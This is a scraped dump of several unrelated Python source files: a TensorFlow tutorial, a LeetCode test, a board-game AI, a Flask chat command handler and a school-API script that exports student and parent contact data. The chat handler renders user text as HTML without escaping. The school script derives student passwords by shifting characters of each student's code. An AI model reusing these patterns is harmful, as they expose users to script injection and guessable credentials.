\\\"ikwzm,u-dma-buf\\\";\\n\"\n dts += f\" device-name = \\\"delilah_data{i}\\\";\\n\"\n dts += f\" size = <0x0 {hex(data_size)}>;\\n\"\n dts += f\" memory-region = <&delilah_d{i}>;\\n\"\n dts += \" sync-mode = <1>;\\n\"\n dts += \" dma-mask = <64>;\\n\"\n dts += \" };\\n\\n\"\n\ndts += f\" udma_s0 {{\\n\"\ndts += \" compatible = \\\"ikwzm,u-dma-buf\\\";\\n\"\ndts += f\" device-name = \\\"delilah_shared0\\\";\\n\"\ndts += f\" size = <0x0 {hex(shared_size)}>;\\n\"\ndts += f\" memory-region = <&delilah_s0>;\\n\"\ndts += \" sync-mode = <1>;\\n\"\ndts += \" dma-mask = <64>;\\n\"\ndts += \" };\\n\\n\"\n\ndts += \"};\\n\"\n\nprint(dts)\n\n","repo_name":"delilah-csp/delilah-pt","sub_path":"project-spec/meta-user/recipes-bsp/device-tree/files/gen_dts.py","file_name":"gen_dts.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30197163869","text":"array=[]\ndeg1=[]\ndic1=dict()\nloop=1\ncase=1\nkey=-2\ndef creatdic(array):\n global dic1\n for i in range(len(deg1)):\n if array[i] in dic1:\n dic1[array[i]] += 1\n else:\n dic1[array[i]] = 1\ndef findkey(dic,val):\n for i in dic:\n if dic[i] == val:\n return i\n return -1\nlargeloop=1\nwhile largeloop==1:\n print(loop)\n while loop==1:\n print(\"in\")\n user=input().split(\" \")\n if user[0]=='-1'and user[1]=='-1':\n loop=0\n largeloop=0\n break\n for i in range(len(user)):\n if i%2==0:\n if user[i]=='0'and user[i+1]=='0':\n loop=0\n break\n deg1.append(user[i])\n print(deg1)\n while len(deg1)>1:\n print(deg1)\n creatdic(deg1)\n key=findkey(dic1,1)\n if key==-1:\n break\n dic1.clear()\n for i in range(len(deg1)):\n if deg1[i]==str(key):\n if i%2==0:\n del deg1[i]\n del deg1[i]\n else:\n del deg1[i]\n del deg1[i-1]\n break\n if key==-1 and user[0]!='-1'and user[1]!=-1:\n print(\"case\", case ,\" is not a tree\")\n if int(key)>-1 and user[0]!='-1'and user[1]!=-1:\n print(\"case\", case ,\" is a tree\")\n key=-2\n case+=1\n user.clear()\n deg1.clear()\n loop=1\n\n","repo_name":"s3819668/cpePractice_python","sub_path":"cpe20201020/uva615.py","file_name":"uva615.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"679325812","text":"import tensorflow as tf \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nhello = tf.constant(\"hello \")\nworld = tf.constant(\"world\")\n\nwith tf.Session() as sess :\n result = sess.run(hello+world)\n\na = tf.constant(10)\nb = tf.constant(20)\n\nwith tf.Session() as sess:\n result = sess.run(a+b) \n\n#numpy ways in tensorflow\nconstant = tf.constant(10)\nfill_mat = tf.fill((4,4),10)\nmyzeros = tf.zeros((4,4))\nmyones = tf.ones((4,4))\n\n#random numbers normal distribution\nmyrandn = tf.random_normal((4,4),mean=0.0,stddev=1.0)\n\n#random numbers uniform distribution\nmyrandu = tf.random_uniform((4,4),minval=0, maxval=1)\n\nop = [constant,fill_mat,myzeros,myones,myrandn,myrandu]\n#interactive session\nsess = tf.InteractiveSession()\n\n# for i in op:\n# print(sess.run(i))\n# print('\\n')\n\n#matrix mul\na = np.arange(1,5).reshape((2,2))\nb = np.array([10,100]).reshape((2,1))\nmatA = tf.constant(a)\nmatB = tf.constant(b)\n#print(sess.run(tf.matmul(matA,matB)))\n#print(tf.matmul(matA,matB).eval())\n\n#graph\nn1 = tf.constant(1)\nn2 = tf.constant(2)\nn3 = n1+n2\n\n#print(tf.get_default_graph())\ng = tf.Graph()\ngraph_one = tf.get_default_graph()\ngraph_two = tf.Graph()\n\n#set graph_two as default graph\nwith graph_two.as_default() :\n #print(graph_two is tf.get_default_graph()) #print true\n pass\n\n\n#variables and placeholder\n#2 main types of tensor object in graph (variable and placeholder)\n#variables can hold the values of weight and biases throughout the session (should be initilized)\n#placehoder used to feed tha actual traning (initial empty)\n\nmy_tensor = tf.random_uniform((4,4),0,1)\nmy_var = tf.Variable(initial_value=my_tensor)\n#we need to initilized variable before run it\nsess.run(tf.global_variables_initializer())\n#print(sess.run(my_var))\n\n#placeholder\nph = tf.placeholder(tf.float32,shape=(None,5))\n\n############ building models ###############\nnp.random.seed(101) #np rand seed \"same result for everyone\"\ntf.set_random_seed(101) #tf rand seed\n\nrand_a = np.random.uniform(0,100,(5,5))\nrand_b = np.random.uniform(0,100,(5,1))\n\n#create placeholders\na = tf.placeholder(tf.float32)\nb = tf.placeholder(tf.float32)\n\n#create oparation\nadd_op = a+b\nmul_op = a*b\n\n#create session => they can use graph with feed dictionary\nwith tf.Session() as sess :\n add_result = sess.run(add_op, feed_dict={a:rand_a,b:rand_b})\n #print(add_result)\n mult_result = sess.run(mul_op,feed_dict={a:rand_a,b:rand_b})\n #print(mult_result)\n\n#create neurons nw\nn_features = 10\nn_dens_neurons = 3 #assumtion : 1 layer and 3 dense neurons\n\nx = tf.placeholder(tf.float32,shape=(None,n_features)) #rows are #of sample\n # cols are # of features\n\nw = tf.Variable(tf.random_normal([n_features,n_dens_neurons])) #weight\nb = tf.Variable(tf.ones([n_dens_neurons]))\n\n#build the perception model\nwx = tf.matmul(x,w)\nz = tf.add(wx,b)\n\n#acivated fn\na = tf.sigmoid(z)\n\n#init tha Variable\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess :\n sess.run(init)\n layer_out = sess.run(a,feed_dict={x:np.random.random([1,n_features])})\n #print(layer_out)\n\n############# simple Regreession ex ###########\nx_data = np.linspace(0,10,10)+np.random.uniform(-1.5,1.5,10)\ny_label = np.linspace(0,10,10)+np.random.uniform(-1.5,1.5,10)\n\n#plt.plot(x_data,y_label, '*')\n#plt.show()\n\n# y = mx+b\nm = tf.Variable(0.44) #initial random values\nb = tf.Variable(0.87)\n\n#cost fn\nerr = 0\nfor x,y in zip(x_data, y_label) :\n y_hat = m*x+b #here represent the predected value\n err += (y-y_hat)**2 #this is what we want to minize\n\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001) #To minize the err\ntrain = optimizer.minimize(err)\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n trainig_steps = 1 #ajust it \n for i in range(trainig_steps) :\n sess.run(train)\n final_slop, final_intercept = sess.run([m,b])\n\nx_test = np.linspace(-1,11,10)\n#y = mx+b\ny_pred_plot = final_slop*x_test + final_intercept #normalized data\n\n# plot\n#plt.plot(x_data,y_label, '*')\n#plt.plot(x_test,y_pred_plot, '*') \n#plt.show()\n\n###########################################################################\n############################ Regrssion analysis ###########################\n###########################################################################\nx_data = np.linspace(0.0,10, 1000000)\nnoise = np.random.randn(len(x_data))\n\n# create model\n#y = mx + b ; m=.5 b = 5\ny_true = (0.5*x_data) + 5 + noise #adding noice we can have complex patten\n # we do not use it when we have real data set to feed\n\n#create data frame\nx_df = pd.DataFrame(data=x_data, columns=['X data'])\ny_df = pd.DataFrame(data=y_true, columns=['Y'])\n#print(x_df.head())\n\n#concatenate 2 data frams\nmy_data = pd.concat([x_df,y_df],axis=1)\n#print(my_data.head())\n\n# note = \n# if we plot all data it cause to crash the kernal beacuse there are hugh data set\n# it is good practise to plot sample from it \n\n#my_data.sample(n=250).plot(kind='scatter', x='X data', y='Y')\n#plt.show()\n\n# need to train data in rensorflow model batch by batch\nbatch_size = 8\nm = tf.Variable(0.81)\nb = tf.Variable(0.17)\n\nxph = tf.placeholder(tf.float32,[batch_size])\nyph = tf.placeholder(tf.float32,[batch_size])\n\ny_model = m*xph + b\n\nerror = tf.reduce_sum(tf.square(yph-y_model))\n\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\ntrain = optimizer.minimize(error)\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n batches = 1000\n\n for i in range(batches) :\n rand_index = np.random.randint(len(x_data), size=batch_size,)\n feed = {xph:x_data[rand_index], yph:y_true[rand_index]}\n sess.run(train, feed_dict=feed)\n \n model_m, model_b = sess.run([m,b])\n\ny_hat = model_b*x_data + model_b # estimate y_hat\n\n#print('b = ',model_b)\n#print('m = ',model_m)\n\n######################################################################\n################ Regression Analysis using ##############################\n############## Estimator API ############################################\n#########################################################################\n\n# steps :\n# define the list of feature cols\n# define the Estimator model\n# create data input function\n# call train evaluate model and predect method on the estimate object\n\nfeat_cols = [tf.feature_column.numeric_column(key='X',shape=[1])] #all the feature in list\nEstimator = tf.estimator.LinearRegressor(feature_columns=feat_cols) #use estimator as linear regression\n\nx_train, x_eval, y_train, y_eval = train_test_split(x_data, y_true, test_size = 0.3,random_state=101) #use x_train 70% and x_eval 30% of data\n\ninput_func = tf.estimator.inputs.numpy_input_fn({'X':x_train},y_train, batch_size=8, num_epochs=None, shuffle=True)\ninput_input_func = tf.estimator.inputs.numpy_input_fn({'X':x_train},y_train, batch_size=8, num_epochs=1000, shuffle=False)\neval_input_func = tf.estimator.inputs.numpy_input_fn({'X':x_eval},y_eval, batch_size=8, num_epochs=1000, shuffle=False)\n\n#now trian the estimator(using matrix)\nEstimator.train(input_fn=input_func, steps=1000) #step just like num_epochs\ntrian_matrix =Estimator.evaluate(input_fn=input_input_func, steps=1000)#get matrix on the training data\neval_matrix = Estimator.evaluate(input_fn=eval_input_func, steps=1000) #basically give lost fn for me\n\nprint('My Training data matrix')\nprint(trian_matrix)\n\nprint('My Test data matrix')\nprint(eval_matrix)\n#note\n#your training data matrix is much better that evaluation matrix data\n#then you must be overfitting your train data\n# Overfitting refers to a model that models the training data too well.\n# Underfitting refers to a model that can neither model the training data nor generalize to new data.\n\n#predict data here\nbrand_new_data = np.linspace(0,10,10)\ninput_fn_predict = tf.estimator.inputs.numpy_input_fn({'X':brand_new_data}, shuffle=False)\nlist(Estimator.predict(input_fn_predict))\npredictions = []\nfor pred in Estimator.predict(input_fn_predict):\n predictions.append(pred['predictions'])\n\nprint(predictions)\n\nmy_data.sample(n=250).plot(kind='scatter', x='X data', y='Y')\nplt.plot(brand_new_data,predictions,'r*')\nplt.show()","repo_name":"Rasika666/ml","sub_path":"tensorflow/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453356575","text":"import unittest\n\nfrom solution import Solution\n\nclass Test(unittest.TestCase):\n def setUp(self) -> None:\n self.s = Solution()\n return super().setUp()\n\n def test1(self):\n words = [\"i\",\"love\",\"leetcode\",\"i\",\"love\",\"coding\"]\n k = 2\n ans = [\"i\",\"love\"]\n self.assertEqual(self.s.topKFrequent(words, k), ans)\n\n def test2(self):\n words = [\"the\",\"day\",\"is\",\"sunny\",\"the\",\"the\",\"the\",\"sunny\",\"is\",\"is\"]\n k = 4\n ans = [\"the\",\"is\",\"sunny\",\"day\"]\n self.assertEqual(self.s.topKFrequent(words, k), ans) \n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"jerrt2003/leetcode-in-python","sub_path":"692_Top_K_Frequent_Words/solution_test.py","file_name":"solution_test.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72038278568","text":"# -*- coding: utf8 -*-\r\nfrom flask_socketio import send, emit\r\n\r\ndef chat(nick, text):\r\n msg = text\r\n result = \"\"\r\n j = 0 \r\n\r\n for i in range(0,len(msg)):\r\n if msg[i:i+4] == \"www.\":\r\n while True:\r\n result += msg[i+j]\r\n j += 1\r\n if msg[i+j] == \" \":\r\n break\r\n msg = msg[:i]+''+result+''+msg[i+j:]\r\n break\r\n\r\n if msg == \"\":\r\n return\r\n \t\t\r\n elif msg[:5] == \"/info\":\r\n text = \"Console ~ Chat server is running!\"\r\n emit('output', text, include_self=True, broadcast=False)\r\n\r\n elif msg[:5] == \"/help\":\r\n text = \"Console
~ Avaible commands: ~
/info (server informations)
/help (this list)
E key (inventory)
SWAD keys (movement)
F key (usage)
T key (chat)
\"\r\n emit('output', text, include_self=True, broadcast=False)\r\n\r\n elif msg[:4] == \"/url\":\r\n if (msg[5:12]==\"http://\")or(msg[5:13]==\"https://\"):\r\n msg = ''+msg[4:]+''\r\n else:\r\n msg = ''+msg[4:]+''\r\n\r\n elif (msg[:7] == \"http://\")or(msg[:8] == \"https://\"):\r\n msg = ''+msg+''\r\n\r\n else:\r\n if(msg[0] == \"/\"):\r\n text = \"Console ~ Unknown command
Use command /help for help.
\"\r\n emit('output', text, include_self=True, broadcast=False)\r\n\r\n if (msg[0] != '/') and (msg != \" \"):\r\n text = \"\"+nick+\": \" +msg+\"\"\r\n emit('output', text, include_self=False, broadcast=True)\r\n text = \"\"+nick+\": \" +msg+\"\"\r\n emit('output', text, include_self=True, broadcast=False)","repo_name":"Athelios/OverDark","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25560569574","text":"import random\n\nfrom game import InputGame, ADVANCE, MUSTER, DEVELOP, DESPOIL\n\n# the four center-most spaces on a 6x6 grid\nCENTER = ((2, 2), (2, 3), (3, 2), (3, 3))\n\ndef random_action (game, action_options):\n possible = []\n for action, options in action_options.items():\n for option in options:\n possible.append([action, option])\n if len(possible) > 0:\n action, param = random.choice(possible)\n action_func = getattr(game, '%s_action' % action.lower())\n action_func(param)\n\ndef despoiler (game, player):\n # WORK TIL YOU CAN'T\n # BUY WHILE YOU CAN\n # GRIN FOR YOU MUST\n # DIE! DIE! DIE!\n action_options = game.player_options(player)\n # despoil if you can\n if DESPOIL in action_options:\n options = action_options[DESPOIL]\n choice = random.choice(options)\n game.despoil_action(choice)\n # muster if you can't\n elif MUSTER in action_options:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n else:\n random_action(game, action_options)\n\ndef overseer (game, player):\n # OF COURSE OUR SUPERVISION IS NECESSARY\n # WHY, JUST THINK OF ALL THE TERRIBLE THINGS YOU MIGHT DO\n # IF LEFT TO YOUR OWN DEVICES\n action_options = game.player_options(player)\n other_units = game.other_player_units(player)\n flanked_coords = { unit.coord for unit in other_units if game.is_flanked(unit) }\n advance_options = action_options.get(ADVANCE, [])\n capture_options = [option for option in advance_options if option[1] in flanked_coords]\n center_occupied = all([game.unit(*coord) or not game.space(*coord).passable for coord in CENTER])\n # stomp a random thing that can be stomped\n if len(capture_options) > 0:\n choice = random.choice(capture_options)\n game.advance_action(choice)\n # raise infrastructure in order to muster battalions\n elif DEVELOP in action_options:\n options = action_options[DEVELOP]\n choice = random.choice(options)\n game.develop_action(choice)\n # raise more forces\n elif MUSTER in action_options:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n # move toward the center to establish control\n elif ADVANCE in action_options and not center_occupied:\n units = game.player_units(player)\n distances = []\n for coord in CENTER:\n for option in advance_options:\n if option[0] in CENTER: continue\n x_distance = abs(coord[0] - option[1][0])\n y_distance = abs(coord[1] - option[1][1])\n distance = x_distance + y_distance\n distances.append([distance, option])\n min_distance = min([distance for distance, option in distances])\n options = [option for distance, option in distances if distance == min_distance]\n choice = random.choice(options)\n game.advance_action(choice)\n # move somewhere. anywhere!\n elif ADVANCE in action_options:\n options = action_options[ADVANCE]\n choice = random.choice(options)\n game.advance_action(choice)\n else:\n random_action(game, action_options)\n\ndef technocrat (game, player):\n # I'M SURE THAT WITH THE RIGHT PEOPLE IN PLACE\n # YOU KNOW, THE PEOPLE WHO KNOW ABOUT THIS SORT OF THING\n # THAT EVERYTHING WILL BE FINE.\n action_options = game.player_options(player)\n units = game.player_units(player)\n if len(units) == 0 and MUSTER in action_options:\n # no units. attempt to muster.\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n elif DEVELOP in action_options:\n # develop\n options = action_options[DEVELOP]\n choice = random.choice(options)\n game.develop_action(choice)\n elif ADVANCE in action_options:\n # advance\n options = action_options[ADVANCE]\n choice = random.choice(options)\n game.advance_action(choice)\n else:\n random_action(game, action_options)\n\ndef expansionist (game, player):\n # ONCE, WE SPANNED THE GLOBE\n # WHY NOT AGAIN?\n # WHY NOT FOREVER\n action_options = game.player_options(player)\n develop_options = action_options.get(DEVELOP, [])\n low_infra_spaces = [coord for coord in develop_options if game.space(*coord)._infra == 0]\n move_options = action_options.get(ADVANCE, [])\n no_infra_moves = [coords for coords in move_options if game.space(*coords[1])._infra == 0]\n units = game.player_units(player)\n # develop any spaces with 0 infra\n if len(low_infra_spaces) > 0:\n choice = random.choice(low_infra_spaces)\n game.develop_action(choice)\n # move to a space with 0 infra\n elif ADVANCE in action_options and len(no_infra_moves) > 0:\n choice = random.choice(no_infra_moves)\n game.advance_action(choice)\n # muster if you have no units\n elif MUSTER in action_options and len(units) == 0:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n # develop further if there is nowhere left to go\n elif DEVELOP in action_options:\n options = action_options[DEVELOP]\n choice = random.choice(options)\n game.develop_action(choice)\n # fortify\n elif MUSTER in action_options and len(units) == 0:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n # move somewhere. anywhere!\n elif ADVANCE in action_options:\n options = action_options[ADVANCE]\n choice = random.choice(options)\n game.advance_action(choice)\n else:\n random_action(game, action_options)\n\ndef random_player (game, player):\n # IS FREE WILL A PHYSICAL FACT\n # OR A MATTER OF PERSPECTIVE?\n action_options = game.player_options(player)\n random_action(game, action_options)\n\nAI = [despoiler, overseer, technocrat, expansionist, random_player]\n\nclass SolitaireGame(InputGame):\n \"\"\"\n A single-player game in which the other three positions are occupied by AI.\n \"\"\"\n\n def __init__ (self):\n super(SolitaireGame, self).__init__(4)\n # keep who's who a secret\n self._ai = [random.choice(AI) for i in range(3)]\n\n def do_turn (self, player):\n if player == 0:\n super(SolitaireGame, self).do_turn(player)\n else:\n ai = self._ai[player-1]\n ai(self, player)\n\nif __name__ == '__main__':\n SolitaireGame.introduction()\n game = SolitaireGame()\n game.play()\n","repo_name":"garbados/ambition-game","sub_path":"solitaire.py","file_name":"solitaire.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74490756966","text":"import argparse\r\nimport re\r\nimport logging\r\nimport requests\r\nfrom ast import literal_eval\r\nimport sys\r\n\r\n## CONSTANTS\r\n\r\nMAIN_URL = 'https://app.sycamoreschool.com/api/v1';\r\n\r\nRELATIONSHIPS = {'Parents' : 1, 'Mother' : 2, 'Father' : 3,\r\n 'Grandmother' : 4, 'Grandfather' : 5,\r\n 'Stepmother' : 6, 'Stepfather' : 7,\r\n 'Aunt' : 8, 'Uncle' : 9, 'Relative' : 10};\r\n \r\nSTUDENT_DOMAIN = '@student.gssb.org'\r\n \r\n## \r\n\r\nclass RestError(Exception):\r\n def __init__(self, value):\r\n self.value = value\r\n def __str__(self):\r\n return repr(self.value);\r\n \r\ndef correctUnicodeEscape(text):\r\n # find all occurrences of the pattern\r\n newText = '';\r\n startIndex = 0;\r\n # find all occurrences of the pattern \\uhhhh in text\r\n for m in re.finditer(r'\\\\u[0-9a-f]{4}', text): \r\n # attach text between patterns to result string\r\n newText += text[startIndex:m.start()]\r\n startIndex = m.end()\r\n # convert \\uhhhh with 4 digit hex number to unicode\r\n hexnum = '0x' + text[m.start()+2:m.end()]\r\n uChar = ''\r\n # only convert and add unicode \r\n if int(hexnum, 0) <= 255:\r\n uChar = chr(int(hexnum, 0))\r\n logging.debug(\"Converted hex \" + hexnum +\r\n \" to special character '\" + uChar + \"'\")\r\n # attach converted unicode character to return string\r\n newText += uChar\r\n \r\n # attach remaining text after last occurrence of pattern\r\n newText += text[startIndex:len(text)]\r\n\r\n return newText;\r\n \r\ndef retrieve(url, token):\r\n\r\n response = requests.get(url, headers={'Authorization': 'Bearer ' + token,\r\n 'Content-type': 'application/json; charset=utf-8'});\r\n if response.status_code == 204:\r\n logging.debug(\"No content found for \" + url)\r\n elif not response.status_code == 200:\r\n msg = 'Request ' + url + ' failed with code ' + str(response.status_code);\r\n raise RestError(msg)\r\n info = correctUnicodeEscape(response.text).replace('\\\\','')\r\n logging.debug((info))\r\n record = [];\r\n try:\r\n if len(info) > 0:\r\n logging.debug(info)\r\n replacedNull = info.replace(':null', ':\"\"')\r\n record = literal_eval(replacedNull)\r\n except ValueError as e:\r\n print(info)\r\n msg = \"Failed type conversion of result \" + info + \" Exception: \" + e.message;\r\n logging.error(msg);\r\n return record;\r\n\r\ndef incrChar(char):\r\n n = chr(ord(char) + 1)\r\n \r\n if (ord(char) == ord('z')):\r\n n = ord('a')\r\n elif (ord(char) == ord('Z')):\r\n n = ord('A')\r\n elif (ord(char) == ord('9')):\r\n n = ord('0')\r\n elif (ord(char) == ord('-')):\r\n n = ord('~')\r\n else:\r\n n = ord(char) + 1\r\n \r\n return chr(n)\r\n\r\ndef incrString(string):\r\n return \"\".join(incrChar(a) for a in string)\r\n\r\ndef camelCase(string):\r\n return \" \".join(a.capitalize() for a in re.split(r\"[^a-zA-Z0-9&#\\.-]\", string))\r\n\r\ndef getSortedContacts(familyId, token):\r\n familyContactsURL = MAIN_URL + '/Family/' + str(familyId) + '/Contacts'\r\n familyContactsDict = retrieve(familyContactsURL, token)\r\n\r\n # Sort family based on RELATIONSHIPS\r\n familyContactsDict = sorted(familyContactsDict, \r\n key=lambda family: sortCriteria(family));\r\n return familyContactsDict\r\n\r\ndef __formatFirstName(name: str) -> str:\r\n return (\r\n name\r\n .strip()\r\n .replace(' ', '')\r\n .replace('\\'', '')\r\n )\r\n\r\ndef __formatLastName(name: str) -> str:\r\n name = (\r\n name\r\n .strip()\r\n .replace('\\'', '')\r\n )\r\n\r\n if name[:4] in ('van ', 'Van ', 'von ', 'Von '):\r\n return name.replace(' ', '')\r\n elif name.startswith('Freiin von '):\r\n return name.replace('Freiin von ', 'Von').replace(' ','-')\r\n elif ' zu ' in name:\r\n return name.replace(' ', '')\r\n elif ' Zu ' in name:\r\n return name.replace(' ', '')\r\n elif name.startswith('de '):\r\n return name.replace(' ', '')\r\n elif name.startswith('De '):\r\n return name.replace(' ', '')\r\n elif ' Nguyen' in name:\r\n return name.replace(' ', '')\r\n elif ' nguyen' in name:\r\n return name.replace(' ', '')\r\n else:\r\n return name.replace(' ', '-')\r\n\r\ndef __createEmailAddress(first_name: str, last_name: str, domain: str) -> str:\r\n return (__formatFirstName(first_name) + '.'\r\n + __formatLastName(last_name)\r\n + domain)\r\n\r\ndef createStudentEmailAddress(first_name: str, last_name: str) -> str:\r\n return __createEmailAddress(first_name, last_name, STUDENT_DOMAIN)\r\n\r\ndef getFamilyEmails(familyContacts):\r\n # pick up to three first family contacts that define an email\r\n firstThree = list(filter(lambda r: includeEmail(r), familyContacts))[:3];\r\n result = [None, \"\", \"\"];\r\n for i in range(0, len(firstThree)):\r\n result[i] = firstThree[i][\"Email\"].strip();\r\n\r\n if (not result[0]):\r\n logging.warning(\"No Email defined for {0} {1}\".format(familyContacts[0][\"LastName\"],\r\n familyContacts[0][\"FirstName\"]))\r\n return result\r\n\r\ndef getParents(familyContacts : list, familyId):\r\n parents = list(filter(lambda r: r[\"PrimaryParent\"] == 1, familyContacts))\r\n result = [None, None];\r\n if len(parents) > 2:\r\n logging.info(\"more than two primaries for family {}\".format(familyId))\r\n result[0:len(parents[:2])] = parents[:2]\r\n assert result[0], \"At least one parent must exist\"\r\n return result\r\n\r\ndef getFamilyDict(MAIN_URL, schoolId, token):\r\n listFamiliesUrl = MAIN_URL + '/School/' + str(schoolId) + '/Families'\r\n listFamilies = retrieve(listFamiliesUrl, token)\r\n logging.info('Found {0} family records.'.format(str(len(listFamilies))))\r\n \r\n familyDict = {}\r\n for family in listFamilies:\r\n familyContacts = getSortedContacts(family[\"ID\"], token)\r\n familyEmails = getFamilyEmails(familyContacts)\r\n [parent1, parent2] = getParents(familyContacts, family[\"Code\"][:7])\r\n family['primaryEmail'] = familyEmails[0]\r\n family['secondaryEmail'] = familyEmails[1]\r\n family['tertiaryEmail'] = familyEmails[2]\r\n \r\n family['parent1FirstName'] = parent1[\"FirstName\"].strip()\r\n family['parent1LastName'] = parent1[\"LastName\"].strip()\r\n family['parent2FirstName'] = parent2[\"FirstName\"].strip() if parent2 else ''\r\n family['parent2LastName'] = parent2[\"LastName\"].strip() if parent2 else ''\r\n\r\n familyDict[family[\"Code\"]] = family\r\n logging.debug(family)\r\n return familyDict\r\n\r\ndef getClassDict(MAIN_URL, schoolId, token):\r\n listClassesUrl = MAIN_URL + '/School/' + str(schoolId) + '/Classes'\r\n classesDict = retrieve(listClassesUrl, token)\r\n logging.info('Retrieving {0} class records.'\r\n .format(str(len(classesDict[\"Period\"]))))\r\n logging.debug(classesDict)\r\n # validate class data\r\n validateClassDetails(classesDict[\"Period\"])\r\n return classesDict\r\n \r\ndef formatStateName(state):\r\n newState = state.strip();\r\n if (\"massachusetts\" in state.strip().lower()):\r\n newState = \"MA\";\r\n elif (\"new hampshire\" in state.strip().lower()):\r\n newState = \"NH\";\r\n elif (\"rhode island\" in state.strip().lower()):\r\n newState = \"RI\";\r\n return newState.upper();\r\n\r\ndef formatClassName(className, teacherLast, teacherFirst):\r\n return className;\r\n\r\ndef sortCriteria(familyMemberRecord):\r\n code = RELATIONSHIPS.get(familyMemberRecord[\"Relation\"], 100);\r\n if (familyMemberRecord[\"PrimaryParent\"] == 1):\r\n code = 1;\r\n return code;\r\n\r\ndef containsEmail(familyMemberRecord):\r\n email = familyMemberRecord[\"Email\"].strip();\r\n return email and \"@\" in email;\r\n\r\ndef includeEmail(familyMemberRecord):\r\n return (sortCriteria(familyMemberRecord) < 100 and\r\n containsEmail(familyMemberRecord));\r\n \r\ndef createRecordHeader() :\r\n header = [\"StudentLastName\",\r\n \"StudentFirstName\",\r\n \"StudentName\",\r\n \"Class\",\r\n \"Room\",\r\n \"TeacherLastName\",\r\n \"TeacherFirstName\",\r\n \"TeacherName\",\r\n \"StudentGSSBEmail,\"\r\n \"FamilyID\",\r\n \"StudentCode\",\r\n \"LingcoPwd\",\r\n \"Nikolaus\",\r\n \"Parent1LastName\",\r\n \"Parent1FirstName\",\r\n \"Parent2LastName\",\r\n \"Parent2FirstName\",\r\n \"ParentNames\",\r\n \"StudentLastNameIfDifferent1\",\r\n \"StudentLastNameIfDifferent2\",\r\n \"PrimaryParentEmail\",\r\n \"SecondaryParentEmail\",\r\n \"TertiaryParentEmail\",\r\n \"StreetAddress\", \r\n \"CityStateZip\"]\r\n \r\n return \",\".join(header);\r\n\r\ndef getAddress(family):\r\n address = ''\r\n addresses = [camelCase(family[\"Address\"].strip()), \r\n camelCase(family[\"Address2\"].strip())]\r\n if (addresses[0] == addresses[1]):\r\n address = '\"' + addresses[0] + '\"'\r\n else:\r\n neAddresses = filter(lambda a:a.strip(), addresses)\r\n address = '\"' + ', '.join(neAddresses) + '\"'\r\n return address\r\n \r\ndef createRecord(aClassRecord, classDetailDict, classStudent, nikolaus, familyDict):\r\n try:\r\n # family code is 7 characters long\r\n familyCode = classStudent[\"Code\"][:7]\r\n studentCode = classStudent[\"Code\"].strip()\r\n family = familyDict.get(familyCode);\r\n if (not family):\r\n logging.error(\"unable to include student with Code \" + familyCode);\r\n record = [];\r\n return \"\"\r\n \r\n family[\"State\"] = formatStateName(family[\"State\"]);\r\n \r\n teacherFullName = aClassRecord[\"PrimaryTeacher\"]\r\n teacherFirstName = \"\"\r\n teacherLastName = \"\"\r\n if (teacherFullName.strip()):\r\n teacherNameTokens = teacherFullName.split()\r\n teacherFirstName = teacherNameTokens[0]\r\n teacherLastName = \" \".join(teacherNameTokens[1:])\r\n \r\n studentLastNameIfDifferent1 = ''\r\n if (classStudent[\"LastName\"].strip().lower() !=\r\n family[\"parent1LastName\"].strip().lower()):\r\n studentLastNameIfDifferent1 = classStudent[\"LastName\"].strip()\r\n \r\n studentLastNameIfDifferent2 = ''\r\n if (family[\"parent2LastName\"] and\r\n family[\"parent2LastName\"].strip() != '' and\r\n classStudent[\"LastName\"].strip().lower() !=\r\n family[\"parent2LastName\"].strip().lower()):\r\n studentLastNameIfDifferent2 = classStudent[\"LastName\"].strip()\r\n \r\n cityStateZip = '\"' + \\\r\n camelCase(family[\"City\"].strip()) + \", \" + \\\r\n family[\"State\"] + \" \" + \\\r\n family[\"ZIP\"][0:5].strip() + '\"';\r\n \r\n facility = classDetailDict.get(\"Facility\", None);\r\n room = \"\"\r\n if facility:\r\n room = facility[\"Name\"].strip();\r\n else:\r\n logging.info('No room for class ' + aClassRecord[\"Name\"].strip())\r\n \r\n record = [classStudent[\"LastName\"].strip(),\r\n classStudent[\"FirstName\"].strip(),\r\n ('\"' + classStudent[\"LastName\"].strip() + ', ' +\r\n classStudent[\"FirstName\"].strip() + '\"'),\r\n formatClassName(aClassRecord[\"Name\"].strip(),\r\n teacherLastName.strip(),\r\n teacherFirstName.strip()),\r\n room,\r\n teacherLastName.strip(),\r\n teacherFirstName.strip(),\r\n ('\"' + teacherLastName.strip() + ', ' +\r\n teacherFirstName.strip() + '\"'),\r\n createStudentEmailAddress(classStudent[\"FirstName\"].strip(), \r\n classStudent[\"LastName\"].strip()),\r\n familyCode,\r\n studentCode,\r\n incrString(studentCode),\r\n nikolaus,\r\n family[\"parent1LastName\"],\r\n family[\"parent1FirstName\"],\r\n family[\"parent2LastName\"],\r\n 